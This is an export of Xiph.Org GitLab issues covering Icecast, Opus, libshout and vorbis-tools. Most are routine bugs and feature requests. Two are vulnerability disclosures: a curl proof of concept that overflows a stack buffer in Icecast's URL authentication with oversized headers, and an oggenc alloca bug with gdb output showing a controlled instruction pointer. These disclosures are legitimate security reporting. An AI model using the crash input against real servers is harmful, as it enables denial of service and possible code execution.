Xiph.Org issueshttps://gitlab.xiph.org/groups/xiph/-/issues2020-10-02T13:37:21Zhttps://gitlab.xiph.org/xiph/icecast-server/-/issues/2343Add API endpoint to sets a mark in the log files2020-10-02T13:37:21ZPhilipp SchafftAdd API endpoint to sets a mark in the log filesThis is for debugging. The endpoint would write marker into the log file. This can be helpful to find things in busy logfiles more easily.
The marker could optionally include a user provided string and username+role of the user who requ...This is for debugging. The endpoint would write marker into the log file. This can be helpful to find things in busy logfiles more easily.
The marker could optionally include a user provided string and username+role of the user who requested the mark.https://gitlab.xiph.org/xiph/icecast-server/-/issues/2342Security vulnerability: buffer overflow in URL authentication allows remote c...2018-11-05T08:00:08ZNick RolfeSecurity vulnerability: buffer overflow in URL authentication allows remote code executionHello,
I would like to report a security vulnerability in the Icecast server.
## The bug
`url_add_client` in `auth_url.c` contains this call inside a loop:
```
post_offset += snprintf(post + post_offset,
sizeo...Hello,
I would like to report a security vulnerability in the Icecast server.
## The bug
`url_add_client` in `auth_url.c` contains this call inside a loop:
```
post_offset += snprintf(post + post_offset,
sizeof(post) - post_offset,
"&%s%s=%s",
url->prefix_headers ? url->prefix_headers : "",
cur_header, header_valesc);
```
If the string to be written is longer than `sizeof(post) - post_offset`, `snprintf` will truncate the string, but will return *the number of bytes it would have written if the buffer were large enough*. This means that `post_offset` is incremented to be larger than `sizeof(post)`, and any subsequent iteration of the loop will write beyond the end of the buffer.
## Proof of concept
I configured a mount using URL authentication that forwards two headers:
```
<mount type="normal">
<mount-name>/auth_url.ogg</mount-name>
<authentication type="url">
<option name="headers" value="x-foo,x-bar"/>
...
</authentication>
</mount>
```
My Icecast server was running on localhost, port 8000, and then I ran the following Bash script:
```
foo=$(python -c "print('a' * 3950)")
bar=123456789123456789
curl -H "x-foo: $foo" -H "x-bar: $bar" http://localhost:8000/auth_url.ogg
```
The `x-foo` header was truncated, but it caused `postoffset` to be incremented beyond the size of the buffer, as described above. The subsequent handling of the `x-bar` header overwrote other stack contents, causing my Icecast server to crash:
```
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
```
By controlling the length of the `x-foo` header, and the contents of the `x-bar` header, it seems likely that remote code execution would be possible.
## Related bug
Our automated analysis highlighted this bug, and another similar misuse of `snprintf` in `format_prepare_headers` in `format.c`, but I did not investigate whether that one would be exploitable.
Those analysis results are visible here: https://lgtm.com/projects/g/xiph/Icecast-Server/alerts/?mode=tree&ruleFocus=1505913226124
## Disclosure
Please let me know when you have fixed the vulnerability, so that we can coordinate our disclosure with yours. For reference, here is a link to our vulnerability disclosure policy: https://lgtm.com/security
Thanks!
--Nick Rolfe, Semmle Security Research TeamThomas B. RückerThomas B. Rückerhttps://gitlab.xiph.org/xiph/icecast-common/-/issues/4Library init/deinit functions2018-11-05T07:57:12ZPhilipp SchafftLibrary init/deinit functionsFunctions should be added to init/deinit the library.
Those functions should work in a reference counter way (maybe even using refobject) to allow the library to be used my multiple parts of the same process.Functions should be added to init/deinit the library.
Those functions should work in a reference counter way (maybe even using refobject) to allow the library to be used my multiple parts of the same process.Philipp SchafftPhilipp Schaffthttps://gitlab.xiph.org/xiph/icecast-common/-/issues/3Move all public headers into one directory2018-10-28T09:45:16ZPhilipp SchafftMove all public headers into one directoryCurrently all *pubic* headers are in the corresponding subdirectories but end up in the same installation directory. All the headers should be moved into a central directory.Currently all *pubic* headers are in the corresponding subdirectories but end up in the same installation directory. All the headers should be moved into a central directory.Marvin ScholzMarvin Scholzhttps://gitlab.xiph.org/xiph/opus/-/issues/2316Assert in celt_decoder when custom modes are disabled2018-10-12T10:17:30ZPhilippe NormandAssert in celt_decoder when custom modes are disabledI can't reproduce this issue outside of WebKit unfortunately. With a libopus built with `--enable-custom-modes=no`, open a youtube video (make sure MediaSource webkit websetting is turned on).
```
Fatal (internal) error in /home/phil/We...I can't reproduce this issue outside of WebKit unfortunately. With a libopus built with `--enable-custom-modes=no`, open a youtube video (make sure MediaSource webkit websetting is turned on).
```
Fatal (internal) error in /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c, line 118: assertion failed: st->mode == opus_custom_mode_create(48000, 960, NULL)
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007f54bd4e82f1 in __GI_abort () at abort.c:79
#2 0x00007f545143e81f in celt_fatal () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/arch.h:76
#3 0x00007f5451446a65 in validate_celt_decoder () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c:118
#4 0x00007f5451446b84 in celt_decode_with_ec () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/celt/celt_decoder.c:867
#5 0x00007f545146d7bf in opus_decode_frame () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_decoder.c:518
#6 0x00007f545146eb16 in opus_decode_native () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_decoder.c:721
#7 0x00007f545147810a in opus_multistream_decode_native () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_multistream_decoder.c:253
#8 0x00007f54514784b9 in opus_multistream_decode () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/libopus-1.3-rc2/src/opus_multistream_decoder.c:398
#9 0x00007f545275c134 in opus_dec_chain_parse_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/ext/opus/gstopusdec.c:630
#10 0x00007f545275d5b3 in gst_opus_dec_handle_frame () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/ext/opus/gstopusdec.c:908
#11 0x00007f54bf915dc9 in gst_audio_decoder_push_buffers () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1540
#12 0x00007f54bf91615b in gst_audio_decoder_chain_forward () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1654
#13 0x00007f54bf917377 in gst_audio_decoder_chain () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiodecoder.c:1914
#14 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#15 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#16 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#17 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#18 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#19 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#20 0x00007f54bf9fbcbb in gst_proxy_pad_chain_default () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstghostpad.c:127
#21 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#22 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#23 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#24 0x00007f54bf9fbcbb in gst_proxy_pad_chain_default () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstghostpad.c:127
#25 0x00007f54c69d892b in webkitMediaSrcChain(_GstPad*, _GstObject*, _GstBuffer*) () from /home/phil/WebKit/WebKitBuild/Release/lib/libwebkit2gtk-4.0.so.37
#26 0x00007f54bfa0daba in gst_pad_chain_data_unchecked () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4322
#27 gst_pad_push_data () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4578
#28 0x00007f54bfa15c32 in gst_pad_push () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gstpad.c:4697
#29 0x00007f54bfb13485 in gst_base_src_loop () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/libs/gst/base/gstbasesrc.c:2957
#30 0x00007f54bfa41cb1 in gst_task_func () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/gstreamer-1.14.4/gst/gsttask.c:332
#31 0x00007f54beb78933 in g_thread_pool_thread_proxy () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/glib-2.54.2/glib/gthreadpool.c:307
#32 0x00007f54beb77fd5 in g_thread_proxy () at /home/phil/WebKit/WebKitBuild/DependenciesGTK/Source/glib-2.54.2/glib/gthread.c:784
#33 0x00007f54c06edf2a in start_thread (arg=0x7f54537fe700) at pthread_create.c:463
#34 0x00007f54bd5a8edf in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```
I don't understand this assert, pointer comparison doesn't make much sense to me in this context.https://gitlab.xiph.org/xiph/icecast-common/-/issues/2Namespace assignment2018-10-12T08:50:38ZPhilipp SchafftNamespace assignmentThis subproject should be assigned a namespace for exported symbols and constants. This is closely related to #1.This subproject should be assigned a namespace for exported symbols and constants. This is closely related to #1.https://gitlab.xiph.org/xiph/icecast-common/-/issues/1common/ should be convered into a library on it's own2022-04-22T08:52:33ZPhilipp Schafftcommon/ should be convered into a library on it's ownThis subproject is currently included as external submodules via VCS. However it is more generally useful and has a complex build system like it is currently. Therefore this should be converted into a real library.This subproject is currently included as external submodules via VCS. However it is more generally useful and has a complex build system like it is currently. Therefore this should be converted into a real library.First release as libiglooMarvin ScholzMarvin Scholzhttps://gitlab.xiph.org/xiph/icecast-server/-/issues/2340authentication subsystem should allow the user to send a custom error2018-10-16T06:39:31ZPhilipp Schafftauthentication subsystem should allow the user to send a custom errorThe authentication subsystem should to send a custom error in case of negative match (deny).
The error to return should be selected by it's report XML UUID.
Example config would look like this:
```xml
<authentication>
<role type="a...The authentication subsystem should to send a custom error in case of negative match (deny).
The error to return should be selected by it's report XML UUID.
Example config would look like this:
```xml
<authentication>
<role type="anonymous" deny-all="*" reject-with="f955b6c6-aaca-4734-aacc-67d86bf83c3b" />
</authentication>
```
This would also be in-line with `AUTH_ALTER_SEND_ERROR`.Philipp SchafftPhilipp Schaffthttps://gitlab.xiph.org/xiph/opusfile/-/issues/2327Build fails with LibreSSL: ./.libs/libopusurl.so: undefined reference to `BIO...2020-06-24T22:38:20ZStefan StroginBuild fails with LibreSSL: ./.libs/libopusurl.so: undefined reference to `BIO_meth_set_puts'LibreSSL 2.6.5, Gentoo Linux.
```
src/http.c: In function ‘op_bio_retry_new’:
src/http.c:1540:3: warning: implicit declaration of function ‘BIO_set_init’; did you mean ‘BIO_sock_init’? [-Wimplicit-function-declaration]
BIO_set_init(_...LibreSSL 2.6.5, Gentoo Linux.
```
src/http.c: In function ‘op_bio_retry_new’:
src/http.c:1540:3: warning: implicit declaration of function ‘BIO_set_init’; did you mean ‘BIO_sock_init’? [-Wimplicit-function-declaration]
BIO_set_init(_b,1);
^~~~~~~~~~~~
BIO_sock_init
src/http.c:1544:3: warning: implicit declaration of function ‘BIO_set_data’; did you mean ‘BIO_set_ex_data’? [-Wimplicit-function-declaration]
BIO_set_data(_b,NULL);
^~~~~~~~~~~~
BIO_set_ex_data
```
and so on.
Full [build.log](/uploads/e3c105fc852d754257bce86f654210a4/build.log)
See also: https://bugs.gentoo.org/588768https://gitlab.xiph.org/xiph/opus/-/issues/2315Minor Issue on libopus 1.3-rc default framesize adjustment2020-04-22T04:19:26ZHeman BusschotsMinor Issue on libopus 1.3-rc default framesize adjustmentHi,
I couldn't post on the IRC for some reason, that's why I want to post it here.
On the libopus 1.3-rc (release candidate), I found it best to change the Framesize setting to 40.
In my case I could increase bitrate from 48kbps to 51kbp...Hi,
I couldn't post on the IRC for some reason, that's why I want to post it here.
On the libopus 1.3-rc (release candidate), I found it best to change the Framesize setting to 40.
In my case I could increase bitrate from 48kbps to 51kbps, where artifacts are hardly heard, while keeping the same file size.
These 3 extra bits, may seem little, but they're the difference between noticeable artifacts at 48kbps (in the stereo spectrum) to nearly fully transparent at 51kbps; all the while keeping the same file size.
Audio quality overall improved slightly thanks to this setting.
Setting it larger or smaller, did not increase quality or decrease filesize.
With that I just want to say that in my opinion, the newer release candidate, runs better with Framesize 40.
It would be nice to further be able to finetune this (between the ranges of 20-60) to see where the exact best setting is located.
The best framesize setting, could be 30, or it could be 45, without the ability to tune it any other than 20, 40, or 60, I wouldn't know...
Not sure if Opus can support such a feature?
Just like CPU complexity is by default set to 10, I think framesize should be set to 40 by default, on the RC candidate (1.3).
Aside from allowing a 6% higher bitrate, while keeping the same file size, it also allows for going much lower in bitrate before capping off the high frequencies.
For instance, For stereo music, I can go as low as 24kbps at almost 48kHz (I think it's capped to 32, but it's mostly inaudible); and for mono I can go as low as 12kbps, before the high frequencies are cut.
Using Framebuffer 20 or 60, has higher tresholds.https://gitlab.xiph.org/xiph/icecast-server/-/issues/2339After logrotate Icecast not using new access.log and error.log files2018-09-28T13:24:06ZDoug TinklenbergAfter logrotate Icecast not using new access.log and error.log filesThe logrotate postrotate command is this for Icecast: */bin/kill -HUP `cat /var/run/icecast/icecast.pid 2>/dev/null` 2> /dev/null || true*
The Icecast installation doesn't create the icecast folder in /var/run so there is no icecast.p...The logrotate postrotate command is this for Icecast: */bin/kill -HUP `cat /var/run/icecast/icecast.pid 2>/dev/null` 2> /dev/null || true*
The Icecast installation doesn't create the icecast folder in /var/run so there is no icecast.pid file.
So what's happening is that after a logrotate the Icecast service continues to use the access.log-date file rather then the new access.log file that is created during the logrotate. The only way to get it to use the new log files is to restart the icecast service.
Why is the logrotate command trying to kill a pid file that doesn't exist and is there another postrotate command that should be used instead.https://gitlab.xiph.org/xiph/icecast-server/-/issues/2338SSL support on Ubuntu 18.042019-01-26T10:42:02ZSimon CechacekSSL support on Ubuntu 18.04Hello,
I am trying to run Icecast on my Ubuntu 18.04 with SSL enabled. When I add the official repository to the system and then use `apt-get install icecast2`, everything will work except that when I will turn the SSL on, I will `get I...Hello,
I am trying to run Icecast on my Ubuntu 18.04 with SSL enabled. When I add the official repository to the system and then use `apt-get install icecast2`, everything will work except that when I will turn the SSL on, I will `get INFO connection/get_ssl_certificate No SSL capability` message, I pre-installed OpenSSL befory icecast installation."
any Idea how to fix this?
I also tried to build by Icecast from the source with the custom path ovf openssl pramater enabled (just put there the default openssl path) and it worked, but this icecast is installed as an app and not as a service, so don't how to reload config without dropping listeners (i need to add relays withour restarting the server as it will server as a proxy).
Thanks for all your time!https://gitlab.xiph.org/xiph/icecast-server/-/issues/2337RFE: Please add a possibility for a relay to transcode the stream2020-11-09T19:35:07Zpetr tomasekRFE: Please add a possibility for a relay to transcode the streamWith Icecast I'm missing the possibility to create transcoding relays in a simple manner. I'd suggest there could be a new configuration option which would specify a binary/script which the stream would go through.
Something like this:
...With Icecast I'm missing the possibility to create transcoding relays in a simple manner. I'd suggest there could be a new configuration option which would specify a binary/script which the stream would go through.
Something like this:
```xml
<relay>
<server>127.0.0.1</server>
<port>8001</port>
<mount>/example.ogg</mount>
<local-mount>/different.ogg</local-mount>
<on-demand>1</on-demand>
<retry-delay>30</retry-delay>
<relay-shoutcast-metadata>0</relay-shoutcast-metadata>
<transcode-bin>/usr/local/bin/transcodestreamXYZ</transcode-bin>
</relay>
```
Thanks!https://gitlab.xiph.org/xiph/icecast-server/-/issues/2336Icecast 2.5.x relays not working2018-07-26T10:19:39ZPhilipp SchafftIcecast 2.5.x relays not workingRelays do not work.
In master since 4a10d7e74422b7c3a31d4677e12f5aa3ce52474f.
client->request_body_length is not correctly set up leading to body read limit (client->request_body_length=0). client generally may not be in correct state.Relays do not work.
In master since 4a10d7e74422b7c3a31d4677e12f5aa3ce52474f.
client->request_body_length is not correctly set up leading to body read limit (client->request_body_length=0). client generally may not be in correct state.Philipp SchafftPhilipp Schaffthttps://gitlab.xiph.org/xiph/icecast-libshout/-/issues/2301libshout does hang in shout_open().2019-05-14T16:44:28ZPhilipp Schafftlibshout does hang in shout_open().libshout in 062373684bdeedf72d5432b0d247f459cb7fc285 hangs in calls to shout_open() in somecases.
In state SHOUT_STATE_RESP_PENDING it passes retry via (rc == SHOUTERR_SOCKET && self->retry). self->retry does not reach 0.
libshout is in...libshout in 062373684bdeedf72d5432b0d247f459cb7fc285 hangs in calls to shout_open() in somecases.
In state SHOUT_STATE_RESP_PENDING it passes retry via (rc == SHOUTERR_SOCKET && self->retry). self->retry does not reach 0.
libshout is in blocking mode with TLS in RFC2818 mode. Server is Icecast 2.4.1. The reply in question is 401 to a probe request. The non-probe request is sent but the socket is closed by the server.
Maybe related to HTTP keep-alive.Philipp SchafftPhilipp Schaffthttps://gitlab.xiph.org/xiph/icecast-server/-/issues/2335`<no-mount>` (`<mount>`'s child) is noop in 2.5.x2021-04-14T10:51:43ZPhilipp Schafft`<no-mount>` (`<mount>`'s child) is noop in 2.5.xThe tag `<no-mount>` (which is a child element of `<mount>`) doesn't seem to do anything in 2.5.x. However according to source code comment it should disallow direct access to the mount.
This may interact with the ACL system.The tag `<no-mount>` (which is a child element of `<mount>`) doesn't seem to do anything in 2.5.x. However according to source code comment it should disallow direct access to the mount.
This may interact with the ACL system.Philipp SchafftPhilipp Schaffthttps://gitlab.xiph.org/xiph/icecast-server/-/issues/2332Change playlist_new default from 4 to 102018-07-09T11:30:46ZRoger HågensenChange playlist_new default from 4 to 10Change `src->history = playlist_new(4 /* DOCUMENT: default is max_tracks=4. */);`
To `src->history = playlist_new(10 /* DOCUMENT: default is max_tracks=10. */);`
Other servers like Shoutcast has 10, various players and webplayers has 10...Change `src->history = playlist_new(4 /* DOCUMENT: default is max_tracks=4. */);`
To `src->history = playlist_new(10 /* DOCUMENT: default is max_tracks=10. */);`
Other servers like Shoutcast has 10, various players and webplayers has 10.
Most service providers do minimal configuration changes so a default of 10 is beneficial as that is most likely what users want anyway.https://gitlab.xiph.org/xiph/icecast-server/-/issues/2331Add history to status-json.xsl2018-07-07T19:19:02ZRoger HågensenAdd history to status-json.xslSince history is now implemented in https://gitlab.xiph.org/xiph/icecast-server/commit/3dd8bdbf40e0988d331724f2a2b5c2bf774584b4 it is hopefully trivial to add this to status-json.xsl as well?Since history is now implemented in https://gitlab.xiph.org/xiph/icecast-server/commit/3dd8bdbf40e0988d331724f2a2b5c2bf774584b4 it is hopefully trivial to add this to status-json.xsl as well?https://gitlab.xiph.org/xiph/icecast-ices/-/issues/2321ices2.0.2 example config missing <yp>2018-10-09T21:06:17ZWaitman Gobbleices2.0.2 example config missing <yp>It would be helpful to have <yp> option and comment in conf/ices-playlist.xml example which ships with 2.0.2.
thanks.It would be helpful to have <yp> option and comment in conf/ices-playlist.xml example which ships with 2.0.2.
thanks.Thomas B. RückerThomas B. Rückerhttps://gitlab.xiph.org/xiph/vorbis-tools/-/issues/2322Uncontrolled alloca() in oggenc which may lead to a remote code execution in ...2018-09-17T19:57:06ZJaeseung ChoiUncontrolled alloca() in oggenc which may lead to a remote code execution in 32-bit environmentDuring a fuzz testing, I found a program-crashing bug in the latest version of `oggenc`. When a malicious AIFF audio file is provided as an input, segmentation fault or remote code execution may occur.
I downloaded http://downloads.xiph...During a fuzz testing, I found a program-crashing bug in the latest version of `oggenc`. When a malicious AIFF audio file is provided as an input, segmentation fault or remote code execution may occur.
I downloaded http://downloads.xiph.org/releases/vorbis/vorbis-tools-1.4.0.tar.gz file, and compiled it with clang 3.8.
In `aiff_open()` function of `oggenc/audio.c` file, size argument of alloca() call is not checked tightly, and therefore a large size of memory can be requested.
```
if(!find_aiff_chunk(in, "COMM", &len))
{
fprintf(stderr, _("Warning: No common chunk found in AIFF file\n"));
return 0; /* EOF before COMM chunk */
}
if(len < 18)
{
fprintf(stderr, _("Warning: Truncated common chunk in AIFF header\n"));
return 0; /* Weird common chunk */
}
buffer = alloca(len);
if(fread(buffer,1,len,in) < len)
{
fprintf(stderr, _("Warning: Unexpected EOF in reading AIFF header\n"));
return 0;
}
```
In 64-bit environment, this will simply make the program to crash, but in 32-bit environment this bug can lead to a remote code execution. If a malicious attacker requests a large size of memory (e.g. alloca(0xffffff00)), this will **lift up** the stack pointer (%esp register) instead of correctly allocating a stack buffer. Then, the subsequent fread() call will overwrite the stack and corrupt the saved return address.
I attach the PoC input file to reproduce this bug.
[poc](/uploads/ab90d639d90d2fca08ddbb6e787f8522/poc)
```
jason@debian-stretch:~/ground/vorbis-tools-1.4.0$ gdb oggenc/oggenc -q
Reading symbols from oggenc/oggenc...done.
(gdb) run ~/poc
Starting program: /home/jason/ground/vorbis-tools-1.4.0/oggenc/oggenc ~/poc
Warning: Unexpected EOF in reading AIFF header
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg $eip
eip 0x41414141 0x41414141
```